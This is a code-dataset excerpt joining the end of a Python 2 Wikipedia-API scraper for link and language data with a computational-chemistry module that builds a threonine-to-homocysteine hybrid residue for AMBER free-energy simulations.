        if len(entry) == 0:
            if len(names_failed) != 0:
                dataframe_failed = dataframe_failed + names_failed
        else:
            frames.append(entry)
    if frames:
        all_dataframes_final = pd.concat(frames)
    else:
        # guard: pd.concat([]) raises ValueError
        all_dataframes_final = []
    return all_dataframes_final, dataframe_failed
def execute_linkshere_in_table_from_names(data):
    """Collect, per 'wk:page' name in *data*, the titles of pages linking to it.

    Follows the API's 'lhcontinue' cursor until the batch is complete or
    roughly 2000 linking titles have been gathered.  Returns
    (dict name -> titles, names whose first request failed).

    The original tested ``request_data.keys()[0] != 'batchcomplete'``,
    which is Python-2-only and depends on dict ordering; checking for the
    'continue' cursor is the documented way to detect further pages.
    """
    linkshere_dictionary = {}
    names_failed = []
    for name in combine_page_names(data):
        payload = request_API_linkshere_by_name(name, '0')
        if payload == 'null':
            names_failed.append(name)
            continue
        title_name, linked = find_lks_name(payload)
        gathered = list(linked)
        while payload != 'null' and 'continue' in payload and len(gathered) < 2000:
            payload = request_API_linkshere_by_name(name, payload['continue']['lhcontinue'])
            if payload != 'null':
                title_name, linked = find_lks_name(payload)
                gathered.extend(linked)
        linkshere_dictionary[name] = gathered
    return linkshere_dictionary, names_failed
def request_API_linkshere_by_name(name, i):
    """Fetch one page of 'links here' results for *name*, starting at cursor *i*.

    Returns the parsed JSON payload, or the sentinel 'null' when the
    response cannot be decoded.
    """
    try:
        url = "https://en.wikipedia.org/w/api.php?action=query&prop=linkshere|pageprops&titles=%s&lhcontinue=%s&format=json" % (name, i)
        return json.loads(requests.get(url).content)
    except ValueError:
        return 'null'
def find_lks_name(request_data):
    # Extract, from a query/linkshere payload, the queried page's canonical
    # title and the titles of the pages linking to it.
    # Returns (title, linking_titles); on a 'null'/error payload the title
    # is an empty list (sic) and the link list is empty.
    all_titles_linked=[]
    if request_data=='null':
        name=[]
    elif 'error' in request_data.keys():
        name=[]
    else:
        data_entities=request_data['query']['pages']
        for item in data_entities:
            # NOTE(review): the accumulator is re-created for every page, so
            # only the links of the LAST page survive -- confirm intended
            # (payloads presumably carry a single page here).
            all_titles_linked=[]
            if item=='-1':
                # page id -1 marks a missing page; only its title is kept
                name=data_entities[item]['title']
            else:
                split=data_entities[item]
                linkshere = finditem(split,'linkshere')
                name=finditem(split,'title')
                try:
                    for entry in linkshere:
                        title_linked=entry['title']
                        all_titles_linked.append(title_linked)
                except Exception as e:
                    # linkshere is None when the page has no incoming links;
                    # the failure is reported but not raised
                    print 'error', e
    return name, all_titles_linked
def request_API_real_name(name):
    """Search Wikipedia for *name*; return the top-hit payload with its word count.

    Returns the sentinel 'null' when the response cannot be decoded as JSON.
    """
    try:
        url = "https://en.wikipedia.org/w/api.php?format=json&action=query&list=search&srsearch=%s&srprop=wordcount&srlimit=1" % name
        return json.loads(requests.get(url).content)
    except ValueError:
        return 'null'
def find_actual_title_wordcount(data):
    """Resolve each row's name through Wikipedia search, recording the
    canonical title in 'wk:page' and its word count in 'wordcount'.

    Prefers a 'name' column when present, otherwise uses 'wk:page'.
    Rows whose lookup fails are carried over unchanged.
    """
    name_column = 'name' if 'name' in data.columns else 'wk:page'
    resolved_rows = []
    for _, row in data.iterrows():
        payload = request_API_real_name(row[name_column])
        if payload == 'null' or 'error' in payload.keys():
            resolved_rows.append(row)
        else:
            # srlimit=1 in the request, so at most one hit is appended
            for hit in payload['query']['search']:
                row['wk:page'] = finditem(hit, 'title')
                row['wordcount'] = finditem(hit, 'wordcount')
                resolved_rows.append(row)
    return pd.DataFrame(resolved_rows)
def get_wiki_page_wiki_id_SPARQL_data(data):
    """Derive 'wk:page' / 'wd:id' columns from SPARQL 'article' and 'cid' URLs.

    Rows whose article URL is missing (string 'nan') are kept untouched.
    """
    enriched = []
    for _, line in data.iterrows():
        if str(line['article']) != 'nan':
            line['wk:page'] = parse_name_from_url(str(line['article']))
            line['wd:id'] = parse_name_from_url(line['cid'])
        enriched.append(line)
    return pd.DataFrame(enriched)
def fix_coordinates_SPARQL_data(data):
    """Split a SPARQL 'Point(lon lat)' literal into separate lat/lon columns.

    Rows whose coordinate cell is missing ('nan') or does not split into a
    two-part value are passed through unchanged.  lat/lon stay as strings.
    """
    fixed_rows = []
    for _, line in data.iterrows():
        raw = str(line['_coordinate_location'])
        if raw != 'nan':
            inside = raw[raw.find("(") + 1:raw.find(")")]
            parts = inside.rsplit(' ', 1)
            if len(parts) == 2:
                # WKT order is "lon lat"
                line['lon'], line['lat'] = parts[0], parts[1]
        fixed_rows.append(line)
    return pd.DataFrame(fixed_rows)
def SPARQL_create_page_id_coordinates(data):
    """Run both SPARQL post-processing steps: id/page extraction, then coordinates."""
    return fix_coordinates_SPARQL_data(get_wiki_page_wiki_id_SPARQL_data(data))
def request_API_name_all_languages(name):
    """Request the first page of interlanguage links for *name*.

    Returns the parsed JSON payload, or 'null' on a decode failure.
    """
    try:
        url = "https://en.wikipedia.org/w/api.php?action=query&titles=%s&prop=langlinks&format=json" % (name)
        return json.loads(requests.get(url).content)
    except ValueError:
        return 'null'
def request_API_name_all_languages_continue(name, i):
    """Request a continuation page of interlanguage links, starting at cursor *i*.

    Returns the parsed JSON payload, or 'null' on a decode failure.
    """
    try:
        url = "https://en.wikipedia.org/w/api.php?action=query&titles=%s&prop=langlinks&format=json&llcontinue=%s" % (name, i)
        return json.loads(requests.get(url).content)
    except ValueError:
        return 'null'
def find_languages_name(request_data):
    """Extract a page's canonical title and its {language: title} link map.

    Failed ('null'/error) payloads and missing pages (page id '-1') yield
    the placeholder title " " alongside whatever links were gathered.
    """
    all_lang_linked = {}
    if request_data == 'null':
        name = " "
    elif 'error' in request_data.keys():
        name = " "
    else:
        pages = request_data['query']['pages']
        for page_id in pages:
            if page_id == '-1':
                name = " "
                continue
            page = pages[page_id]
            name = finditem(page, 'title')
            if 'langlinks' in page.keys():
                for entry in finditem(page, 'langlinks'):
                    # '*' holds the title in the target language
                    all_lang_linked[entry['lang']] = entry['*']
    return name, all_lang_linked
def execute_languages_in_dictionary_from_names(data):
    # Build, for every 'wk:page' name in *data*, the map of interlanguage
    # titles by following the API's 'llcontinue' cursor to exhaustion.
    # Returns (dict name -> {lang: title}, list of failed lookups).
    all_names=combine_page_names(data)
    all_titles_linked_final={}
    language_dictionary={}
    names_failed=[]
    for name in all_names:
        all_titles_linked_final={}
        request_data=request_API_name_all_languages(name)
        if request_data!='null':
            if 'error' in request_data.keys():
                # NOTE(review): title_name is unbound when the very first
                # lookup errors -- this likely should append `name` instead.
                names_failed.append(title_name)
            else:
                title_name,all_lang_linked=find_languages_name(request_data)
                all_titles_linked_final.update(all_lang_linked)
        # NOTE(review): keys()[0] is Python-2-only and relies on dict
        # ordering; the intent is "keep going while a continuation cursor
        # is present" (the payload carries 'continue' until exhausted).
        while request_data!='null' and request_data.keys()[0]!='batchcomplete':
            request_data=request_API_name_all_languages_continue(name,request_data['continue']['llcontinue'])
            if request_data!='null':
                if 'error' in request_data.keys():
                    names_failed.append(title_name)
                else:
                    title_name,all_lang_linked=find_languages_name(request_data)
                    all_titles_linked_final.update(all_lang_linked)
            else:
                names_failed.append(title_name)
        # the name is recorded even when its first payload was 'null'
        # (empty map, no failure entry in that case)
        language_dictionary.update({name:all_titles_linked_final})
return language_dictionary, names_failed | [
"Olga Kavvada"
] | Olga Kavvada |
0627dc44488b0cb662ac6134c35bb17478c0fece | 47b4d76e9c87e6c45bab38e348ae12a60a60f94c | /Mutation_Modules/More_Backup/THR_HCY.py | 4a4ce8698134116f04127cebda9e92d3ca02eea6 | [] | no_license | PietroAronica/Parasol.py | 9bc17fd8e177e432bbc5ce4e7ee2d721341b2707 | 238abcdc2caee7bbfea6cfcdda1ca705766db204 | refs/heads/master | 2021-01-10T23:57:40.225140 | 2020-10-14T02:21:15 | 2020-10-14T02:21:15 | 70,791,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,357 | py | # THR to HCY Mutation
import Frcmod_creator
import PDBHandler
import Leapy
from ParmedTools.ParmedActions import *
from chemistry.amber.readparm import *
def parmed_command(vxi='VXI'):
    """Scale the VXI residue's charges over 11 lambda windows (THR -> HCY).

    Reads per-atom charges of the start state (THR) and end state (HCY)
    from the Param_files tables, then edits each pre-built
    Solv_<a>_<100-a>.prmtop topology in place: most atoms are linearly
    interpolated between the two states, vanishing THR atoms are ramped
    to zero, and the LJ interaction of the dummy-atom pairs is switched
    off so appearing/disappearing atoms never clash sterically.
    """
    # bc: beginning-state (THR) charges keyed by atom name
    # (first line of the .param file is a header and is skipped)
    bc = {}
    with open('Param_files/AminoAcid/THR.param', 'r') as b:
        data = b.readlines()[1:]
        for line in data:
            key, value = line.split()
            bc[key] = float(value)
        b.close()
    # fc: final-state (HCY) charges
    fc = {}
    with open('Param_files/AminoAcid/HCY.param', 'r') as b:
        data = b.readlines()[1:]
        for line in data:
            key, value = line.split()
            fc[key] = float(value)
        b.close()
    # one topology per 10% lambda step: Solv_0_100 ... Solv_100_0
    for i in range(11):
        a = i*10
        parm = AmberParm('Solv_{}_{}.prmtop'.format(a, 100-a))
        # zero the LJ terms between each dummy atom and its counterpart
        changeLJPair(parm, ':{}@HB2 :{}@HG1 0 0'.format(vxi, vxi)).execute()
        changeLJPair(parm, ':{}@HG21 :{}@HD 0 0'.format(vxi, vxi)).execute()
        # shared atoms: linear interpolation bc -> fc over the 10 steps
        change(parm, 'charge', ':{}@N'.format(vxi), bc['N']+((fc['N']-bc['N'])/10)*i).execute()
        change(parm, 'charge', ':{}@H'.format(vxi), bc['H']+((fc['H']-bc['H'])/10)*i).execute()
        change(parm, 'charge', ':{}@CA'.format(vxi), bc['CA']+((fc['CA']-bc['CA'])/10)*i).execute()
        change(parm, 'charge', ':{}@HA'.format(vxi), bc['HA']+((fc['HA']-bc['HA'])/10)*i).execute()
        change(parm, 'charge', ':{}@CB'.format(vxi), bc['CB']+((fc['CB']-bc['CB'])/10)*i).execute()
        # HB2 appears in HCY: ramp up from zero
        change(parm, 'charge', ':{}@HB2'.format(vxi), fc['HB2']/10*i).execute()
        change(parm, 'charge', ':{}@HB3'.format(vxi), bc['HB']+((fc['HB3']-bc['HB'])/10)*i).execute()
        change(parm, 'charge', ':{}@CG'.format(vxi), bc['CG2']+((fc['CG']-bc['CG2'])/10)*i).execute()
        # HG21/OG1/HG1 vanish with THR: ramp down to zero
        change(parm, 'charge', ':{}@HG21'.format(vxi), bc['HG21']-(bc['HG21']/10)*i).execute()
        change(parm, 'charge', ':{}@HG2'.format(vxi), bc['HG22']+((fc['HG2']-bc['HG22'])/10)*i).execute()
        change(parm, 'charge', ':{}@HG3'.format(vxi), bc['HG23']+((fc['HG3']-bc['HG23'])/10)*i).execute()
        change(parm, 'charge', ':{}@OG1'.format(vxi), bc['OG1']-(bc['OG1']/10)*i).execute()
        change(parm, 'charge', ':{}@HG1'.format(vxi), bc['HG1']-(bc['HG1']/10)*i).execute()
        # NOTE(review): SD/HD use (q/10)*i*i/10, i.e. a quadratic ramp --
        # confirm this deviation from the linear scheme is intentional.
        change(parm, 'charge', ':{}@SD'.format(vxi), (fc['SD']/10)*i*i/10).execute()
        change(parm, 'charge', ':{}@HD'.format(vxi), (fc['HD']/10)*i*i/10).execute()
        change(parm, 'charge', ':{}@C'.format(vxi), bc['C']+((fc['C']-bc['C'])/10)*i).execute()
        change(parm, 'charge', ':{}@O'.format(vxi), bc['O']+((fc['O']-bc['O'])/10)*i).execute()
        # write the edited topology back over the original file
        setOverwrite(parm).execute()
        parmout(parm, 'Solv_{}_{}.prmtop'.format(a, 100-a)).execute()
def makevxi(struct, out, aa, vxi='VXI'):
    """Rewrite PDB *struct* so residue *aa* becomes the THR/HCY hybrid VXI.

    THR atoms are renamed/repositioned toward the homocysteine topology:
    HB spawns HB2 and becomes HB3, CG2 becomes CG, HG22/HG23 become
    HG2/HG3, and dummy SD/HD atoms are placed from the old CG2/HG21
    positions.  The rewritten structure is written to *out*; record order
    matters, since later steps rely on the emitted atom sequence.
    """
    struct.residue_dict[aa].set_resname(vxi)
    # anchor atoms used to position the new/renamed atoms
    CG2 = struct.residue_dict[aa].atom_dict['CG2']
    HG21 = struct.residue_dict[aa].atom_dict['HG21']
    OG1 = struct.residue_dict[aa].atom_dict['OG1']
    pdb = open(out, 'w')
    try:
        pdb.write(struct.other_dict['Cryst1'].formatted())
    except KeyError:
        # no unit-cell record in the input; fine for non-crystal PDBs
        pass
    for res in struct.residue_list:
        for atom in res.atom_list:
            if atom.get_name() == 'HB' and res.get_resname() == vxi:
                # new HB2 is placed on top of OG1; the old HB becomes HB3
                pdb.write(atom.superimposed1('HB2', OG1))
                pdb.write(atom.change_name('HB3'))
            elif atom.get_name() == 'CG2' and res.get_resname() == vxi:
                pdb.write(atom.change_name('CG'))
            elif atom.get_name() == 'HG22' and res.get_resname() == vxi:
                pdb.write(atom.change_name('HG2'))
            elif atom.get_name() == 'HG23' and res.get_resname() == vxi:
                pdb.write(atom.change_name('HG3'))
                # grow the side chain: SD midway between CG2 and HG21,
                # HD on top of HG21 (HG21 itself is emitted unchanged)
                pdb.write(atom.halfway_between('SD', CG2, HG21))
                pdb.write(atom.superimposed1('HD', HG21))
            else:
                pdb.write(atom.formatted())
        try:
            # per-residue TER record, when one exists for this residue number
            pdb.write(struct.other_dict[res.get_resnumber()].ter())
        except:
            pass
    for oth in struct.other_dict:
        try:
            # copy CONECT records through; non-string keys are skipped
            if oth.startswith('Conect'):
                pdb.write(struct.other_dict[oth].formatted())
        except:
            pass
    pdb.write('END\n')
def lib_make(ff, outputfile, vxi='VXI', thisul='cs', thihyd='ch', hydhyd1='yh', alcoxy='ho', alchyd='hh', hydhyd2='sh', thrhyd='fh', cyshyd='gh'):
    """Write a LEaP input script defining the 17-atom hybrid residue and run it.

    The script loads Param_files/LibPDB/THR-HCY.pdb, assigns element / name /
    AMBER atom type per atom index (1..17), declares the bonds, sets the
    backbone connection points, and saves the unit with ``saveoff``.  The
    emitted script is byte-identical to the previous hand-unrolled version;
    the per-atom tables below just remove the ~70 duplicated write calls.

    :param ff: force-field leaprc suffix (``source leaprc.<ff>``)
    :param outputfile: log file handed to Leapy.run
    :param vxi: unit/residue name
    :param thisul..cyshyd: custom AMBER atom-type codes for the hybrid atoms
    """
    # Per-atom tables, index 1..17 in PDB order.
    elements = ['N', 'H', 'C', 'H', 'C', 'H', 'H', 'C', 'H',
                'H', 'H', 'O', 'H', 'S', 'H', 'C', 'O']
    names = ['N', 'H', 'CA', 'HA', 'CB', 'HB2', 'HB3', 'CG', 'HG21',
             'HG2', 'HG3', 'OG1', 'HG1', 'SD', 'HD', 'C', 'O']
    types = ['N', 'H', 'CT', 'H1', 'CT', hydhyd2, thrhyd, 'CT', hydhyd1,
             cyshyd, cyshyd, alcoxy, alchyd, thisul, thihyd, 'C', 'O']
    # Covalent bonds between atom indices.
    bonds = [(1, 2), (1, 3), (3, 4), (3, 5), (3, 16), (5, 6), (5, 7), (5, 8),
             (5, 12), (8, 9), (8, 10), (8, 11), (8, 14), (12, 13), (14, 15),
             (16, 17)]
    with open('lyp.in', 'w') as ctrl:
        ctrl.write("source leaprc.%s\n" % ff)
        ctrl.write("%s=loadpdb Param_files/LibPDB/THR-HCY.pdb\n" % vxi)
        for idx, element in enumerate(elements, 1):
            ctrl.write('set %s.1.%d element "%s"\n' % (vxi, idx, element))
        for idx, name in enumerate(names, 1):
            ctrl.write('set %s.1.%d name "%s"\n' % (vxi, idx, name))
        for idx, atom_type in enumerate(types, 1):
            ctrl.write('set %s.1.%d type "%s"\n' % (vxi, idx, atom_type))
        for a, b in bonds:
            ctrl.write('bond %s.1.%d %s.1.%d\n' % (vxi, a, vxi, b))
        # Backbone connectivity and unit bookkeeping.
        ctrl.write('set %s.1 connect0 %s.1.N\n' % (vxi, vxi))
        ctrl.write('set %s.1 connect1 %s.1.C\n' % (vxi, vxi))
        ctrl.write('set %s name "%s"\n' % (vxi, vxi))
        ctrl.write('set %s.1 name "%s"\n' % (vxi, vxi))
        ctrl.write('set %s head %s.1.N\n' % (vxi, vxi))
        ctrl.write('set %s tail %s.1.C\n' % (vxi, vxi))
        ctrl.write('saveoff %s %s.lib\n' % (vxi, vxi))
        ctrl.write("quit\n")
    Leapy.run('lyp.in', outputfile)
def all_make():
    """Generate the frcmod file for every 10% window: 0_100, 10_90, ... 100_0."""
    for percent in range(0, 110, 10):
        Frcmod_creator.make('{}_{}.frcmod'.format(percent, 100 - percent))
def cal(x, y, i):
    """Interpolate linearly from x (at i=0) toward y (at i=10) in tenth steps."""
    return x + (y - x) / 10 * i
def cal2(x, y, i):
    """Interpolate linearly from y (at i=0) toward x (at i=10) in tenth steps."""
    return y + (x - y) / 10 * i
def stock_add_to_all(vxi='VXI', thisul='cs', thihyd='ch', hydhyd1='yh', alcoxy='ho', alchyd='hh', hydhyd2='sh', thrhyd='fh', cyshyd='gh'):
    """Register the hybrid atom types and write interpolated force-field terms
    into every <a>_<100-a>.frcmod window (a = 0, 10, ..., 100).

    Stock end-point parameters come from Param_files/Stock/Stock.param; cal()
    interpolates the THR-like terms forward with i, cal2() interpolates the
    CYS/HCY-like terms in the opposite direction, so the two half-residues
    fade in/out across the 11 lambda windows.  Each table row is
    ``key v0 v1 v2 v3`` — indices [0]/[1] feed MASS/BOND/ANGLE-style entries,
    [2]/[3] feed the NONBON entries.
    """
    Frcmod_creator.make_hyb()
    # Declare the custom sp3 atom types used by the hybrid residue.
    Frcmod_creator.TYPE_insert(alcoxy, 'O', 'sp3')
    Frcmod_creator.TYPE_insert(alchyd, 'H', 'sp3')
    Frcmod_creator.TYPE_insert(hydhyd1, 'H', 'sp3')
    Frcmod_creator.TYPE_insert(thisul, 'S', 'sp3')
    Frcmod_creator.TYPE_insert(thihyd, 'H', 'sp3')
    Frcmod_creator.TYPE_insert(hydhyd2, 'H', 'sp3')
    Frcmod_creator.TYPE_insert(thrhyd, 'H', 'sp3')
    Frcmod_creator.TYPE_insert(cyshyd, 'H', 'sp3')
    # Parse the stock parameter table (header line skipped): first token is
    # the key, remaining tokens are floats.
    p = {}
    with open('Param_files/Stock/Stock.param', 'r') as b:
        data = b.readlines()[1:]
        for line in data:
            p[line.split()[0]] = []
            for point in line.split()[1:]:
                p[line.split()[0]].append(float(point))
        b.close()  # redundant: the with-statement already closes the file
    for i in range(11):
        a = i*10
        # --- THR-side terms, interpolated forward with cal() ---
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), alcoxy, cal(p['OH'][0], p['0_O'][0], i), cal(p['OH'][1], p['0_O'][1], i))
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), alchyd, cal(p['HO'][0], p['0_H'][0], i), cal(p['HO'][1], p['0_H'][1], i))
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd2, cal(p['0_H'][0], p['HC'][0], i), cal(p['0_H'][1], p['HC'][1], i))
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), thrhyd, cal(p['H1'][0], p['HC'][0], i), cal(p['H1'][1], p['HC'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', alcoxy), cal(p['CT_OH'][0], p['OH_mH'][0], i), cal(p['CT_OH'][1], p['OH_mH'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', hydhyd2), cal(p['HC_sO'][0], p['CT_HC'][0], i), cal(p['HC_sO'][1], p['CT_HC'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', thrhyd), cal(p['CT_HC'][0], p['CT_HC'][0], i), cal(p['CT_HC'][1], p['CT_HC'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(alcoxy, alchyd), cal(p['OH_HO'][0], p['HO_mH'][0], i), cal(p['OH_HO'][1], p['HO_mH'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(hydhyd2, 'CT', alcoxy), cal(p['Close'][0], p['Close'][0], i), cal(p['Close'][1], p['Close'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', alcoxy), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', alcoxy, alchyd), cal(p['C_O_H'][0], p['Dritt'][0], i), cal(p['C_O_H'][1], p['Dritt'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(thrhyd, 'CT', hydhyd2), cal(p['H_C_H'][0], p['H_C_H'][0], i), cal(p['H_C_H'][1], p['H_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(thrhyd, 'CT', alcoxy), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', thrhyd), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', hydhyd2), cal(p['C_C_H'][0], p['C_C_H'][0], i), cal(p['C_C_H'][1], p['C_C_H'][1], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(hydhyd2, 'CT', alcoxy, alchyd), cal(p['0_Dihe'][0], p['0_Dihe'][0], i), cal(p['0_Dihe'][1], p['0_Dihe'][1], i), cal(p['0_Dihe'][2], p['0_Dihe'][2], i), cal(p['0_Dihe'][3], p['0_Dihe'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alchyd, alcoxy, 'CT', thrhyd), cal(p['X_C_O_X'][0], p['0_5'][0], i), cal(p['X_C_O_X'][1], p['0_5'][1], i), cal(p['X_C_O_X'][2], p['0_5'][2], i), cal(p['X_C_O_X'][3], p['0_5'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alchyd, alcoxy, 'CT', 'CT'), cal(p['C_C_O_H_2'][0], p['0_3'][0], i), cal(p['C_C_O_H_2'][1], p['0_3'][1], i), cal(p['C_C_O_H_2'][2], p['0_3'][2], i), cal(p['C_C_O_H_2'][3], p['0_3'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alchyd, alcoxy, 'CT', 'CT'), cal(p['C_C_O_H_1'][0], p['0_2'][0], i), cal(p['C_C_O_H_1'][1], p['0_2'][1], i), cal(p['C_C_O_H_1'][2], p['0_2'][2], i), cal(p['C_C_O_H_1'][3], p['0_2'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alcoxy, 'CT', 'CT', 'H1'), cal(p['C_C_O_H_2'][0], p['0_3'][0], i), cal(p['C_C_O_H_2'][1], p['0_3'][1], i), cal(p['C_C_O_H_2'][2], p['0_3'][2], i), cal(p['C_C_O_H_2'][3], p['0_3'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(alcoxy, 'CT', 'CT', 'H1'), cal(p['C_C_O_H_1'][0], p['0_2'][0], i), cal(p['C_C_O_H_1'][1], p['0_2'][1], i), cal(p['C_C_O_H_1'][2], p['0_2'][2], i), cal(p['C_C_O_H_1'][3], p['0_2'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), alcoxy, cal(p['OH'][2], p['0_O'][2], i), cal(p['OH'][3], p['0_O'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), alchyd, cal(p['HO'][2], p['0_H'][2], i), cal(p['HO'][3], p['0_H'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd2, cal(p['0_H'][2], p['HC'][2], i), cal(p['0_H'][3], p['HC'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), thrhyd, cal(p['H1'][2], p['HC'][2], i), cal(p['H1'][3], p['HC'][3], i))
        # --- CYS/HCY-side terms, interpolated in reverse with cal2() ---
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), thisul, cal2(p['SH'][0], p['0_O'][0], i), cal2(p['SH'][1], p['0_O'][1], i))
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), thihyd, cal2(p['HS'][0], p['0_H'][0], i), cal2(p['HS'][1], p['0_H'][1], i))
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), hydhyd1, cal2(p['0_H'][0], p['HC'][0], i), cal2(p['0_H'][1], p['HC'][1], i))
        Frcmod_creator.MASS_insert('{}_{}.frcmod'.format(a, 100-a), cyshyd, cal2(p['H1'][0], p['HC'][0], i), cal2(p['H1'][1], p['HC'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', thisul), cal2(p['CT_SH'][0], p['SH_mHC'][0], i), cal2(p['CT_SH'][1], p['SH_mHC'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', hydhyd1), cal2(p['HC_sS'][0], p['CT_HC'][0], i), cal2(p['HC_sS'][1], p['CT_HC'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format('CT', cyshyd), cal2(p['CT_HC'][0], p['CT_HC'][0], i), cal2(p['CT_HC'][1], p['CT_HC'][1], i))
        Frcmod_creator.BOND_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}'.format(thisul, thihyd), cal2(p['SH_HS'][0], p['HS_mHC'][0], i), cal2(p['SH_HS'][1], p['HS_mHC'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(hydhyd1, 'CT', thisul), cal2(p['Close'][0], p['Close'][0], i), cal2(p['Close'][1], p['Close'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', thisul), cal2(p['C_C_SH'][0], p['C_C_H'][0], i), cal2(p['C_C_SH'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', thisul, thihyd), cal2(p['C_SH_H'][0], p['Dritt'][0], i), cal2(p['C_SH_H'][1], p['Dritt'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(cyshyd, 'CT', hydhyd1), cal2(p['H_C_H'][0], p['H_C_H'][0], i), cal2(p['H_C_H'][1], p['H_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(cyshyd, 'CT', cyshyd), cal2(p['H_C_H'][0], p['H_C_H'][0], i), cal2(p['H_C_H'][1], p['H_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format(cyshyd, 'CT', thisul), cal2(p['C_C_H'][0], p['C_C_H'][0], i), cal2(p['C_C_H'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', cyshyd), cal2(p['C_C_H'][0], p['C_C_H'][0], i), cal2(p['C_C_H'][1], p['C_C_H'][1], i))
        Frcmod_creator.ANGLE_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}'.format('CT', 'CT', hydhyd1), cal2(p['C_C_SH'][0], p['C_C_H'][0], i), cal2(p['C_C_SH'][1], p['C_C_H'][1], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(hydhyd1, 'CT', thisul, thihyd), cal2(p['0_Dihe'][0], p['0_Dihe'][0], i), cal2(p['0_Dihe'][1], p['0_Dihe'][1], i), cal2(p['0_Dihe'][2], p['0_Dihe'][2], i), cal2(p['0_Dihe'][3], p['0_Dihe'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(thihyd, thisul, 'CT', cyshyd), cal2(p['X_C_SH_X'][0], p['0_5'][0], i), cal2(p['X_C_SH_X'][1], p['0_5'][1], i), cal2(p['X_C_SH_X'][2], p['0_5'][2], i), cal2(p['X_C_SH_X'][3], p['0_5'][3], i))
        Frcmod_creator.DIHEDRAL_insert('{}_{}.frcmod'.format(a, 100-a), '{}-{}-{}-{}'.format(thihyd, thisul, 'CT', 'CT'), cal2(p['X_C_SH_X'][0], p['0_5'][0], i), cal2(p['X_C_SH_X'][1], p['0_5'][1], i), cal2(p['X_C_SH_X'][2], p['0_5'][2], i), cal2(p['X_C_SH_X'][3], p['0_5'][3], i))
        Frcmod_creator.NONBON_insert('{}_{}.frcmod'.format(a, 100-a), thisul, cal2(p['SH'][2], p['0_S'][2], i), cal2(p['SH'][3], p['0_S'][3], i))
